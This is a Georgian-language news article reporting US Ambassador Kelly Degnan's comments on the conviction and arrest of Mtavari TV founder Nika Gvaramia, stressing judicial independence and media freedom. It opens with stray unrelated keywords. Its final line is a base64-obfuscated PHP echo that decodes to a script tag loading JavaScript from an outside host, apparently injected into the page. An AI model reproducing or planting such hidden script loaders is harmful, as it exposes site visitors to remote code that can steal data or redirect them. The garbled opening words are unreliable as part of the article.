celsiusi
ავერსი შნაიდერი
ამ საქმემ დასაწყისიდანვე გააჩინა კითხვები მის დროულობასთან, საქმეში არსებულ ბრალდებებთან და პროცესთან დაკავშირებით. ადამიანები საქართველოში დარწმუნებულები უნდა იყვნენ, რომ საქმეში არ ყოფილა პოლიტიკური ჩარევა და არ განხორციელდა შერჩევითი დევნა,- ამის შესახებ საქართველოში ამერიკის შეერთებული შტატების ელჩმა კელი დეგნანმა ტელეკომპანია „მთავარის“ დირექტორის ნიკა გვარამიას დაპატიმრებასთან დაკავშირებით განაცხადა.
 
მისი თქმით, აღქმაც კი, რომ შეიძლება იყოს პოლიტიკური ჩარევა ან შერჩევითი დევნა, ძირს უთხრის საზოგადოების რწმენას მსგავსი საქმეების შედეგების მიმართ.
 
„მესმის, რომ ეს გადაწყვეტილება ბევრი ადამიანისთვის მნიშვნელოვანია. იმ პოზიციაში არ ვარ, რომ საქმის არსებით ნაწილზე კომენტარი გავაკეთო, მაგრამ ვიტყვი, რომ ამ საქმემ დასაწყისიდანვე გააჩინა კითხვები მის დროულობასთან დაკავშირებით, საქმეში არსებულ ბრალდებებთან დაკავშირებით, პროცესთან დაკავშირებით. ადამიანებს საქართველოში უნდა სჯეროდეთ, რომ განაჩენი სამართლიანია, ისინი დარწმუნებულები უნდა იყვნენ, რომ საქმეში არ ყოფილა პოლიტიკური ჩარევა და არ განხორციელდა შერჩევითი დევნა. აღქმაც კი, რომ შეიძლება იყოს პოლიტიკური ჩარევა ან შერჩევითი დევნა, ძირს უთხრის საზოგადოების რწმენას მსგავსი "ქეისების" შედეგების მიმართ. სწორედ ამიტომ, ძალიან მნიშვნელოვანია სამუშაო, რომელსაც ჩვენ ვასრულებთ დღეს იმის ხაზგასასმელად, რომ საქართველოს სჭირდება გააგრძელოს რეფორმების განხორციელება, რომელიც გააძლიერებს სასამართლო სისტემას, გახდის მას უფრო მეტად დამოუკიდებელს, მეტად მიუკერძოებელს. საქართველომ მიაღწია მნიშვნელოვან პროგრესს უკანასკნელი 20 წლის განმავლობაში, სასამართლო სისტემის მშენებლობაში და ახლა სამუშაო პროცესი უნდა გაგრძელდეს.
 
როდესაც საქმე თავის თავში მოიცავს მედიასაც, ხდება კიდევ უფრო მნიშვნელოვანი, რომ ის იყოს გამჭვირვალე და იყოს ძალიან ცხადი, რომ მასთან გამკლავება მიუკერძოებლად მოხდა. სხვა შემთხვევაში ორი კონსტიტუციური პრინციპი დგება საფრთხის წინაშე - მედია დამოუკიდებლობა და სამართლიანი სასამართლოს უფლება. ეს უბრალოდ არსებითია საქართველოში არსებული გარემოს გათვალისწინებით, სადაც ყველა ამდენად სწრაფია ერთმანეთზე თავდასხმაში“,- განაცხადა კელი დეგნანმა.
 
აშშ-ის ელჩი საქართველოს ევროატლანტიკურ მისწრაფებებსაც გამოეხმაურა და აღნიშნა, რომ სწორედ რეფორმები, რომლებიც სასამართლო სისტემისადმი მოსახლეობის რწმენას აღრმავებს, არის საკვანძო ამ პროცესში.
 
„ჩვენ, ყველას გვსურს ვიხილოთ საქართველოს წარმატება მის წევრობის მისწრაფებებთან დაკავშირებით ევროკავშირსა და ნატოში. ჩვენ ყველა ვმუშაობთ ამ შედეგისთვის. რეფორმები რომელიც იწვევს საზოგადოების რწმენას სასამართლო სისტემის მიმართ, არის საკვანძო ამ პროცესში“,- განაცხადა კელი დეგნანმა.
 
ცნობისათვის, „მთავარი არხის“ დამფუძნებელი ნიკა გვარამია, რომელიც სასამართლომ დამნაშავედ ცნო, სხდომათა დარბაზშივე დააკავეს. თბილისის საქალაქო სასამართლოს მოსამართლემ, ლაშა ჩხიკვაძემ ნიკა გვარამია ნაწილობრივ დამნაშავედ ცნო, მის მიმართ წარდგენილი მუხლების ნაწილი 220-ე მუხლით გადაკვალიფიცირდა და მას სასჯელის სახით 3 წელი და 6 თვე განესაზღვრა.
737
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");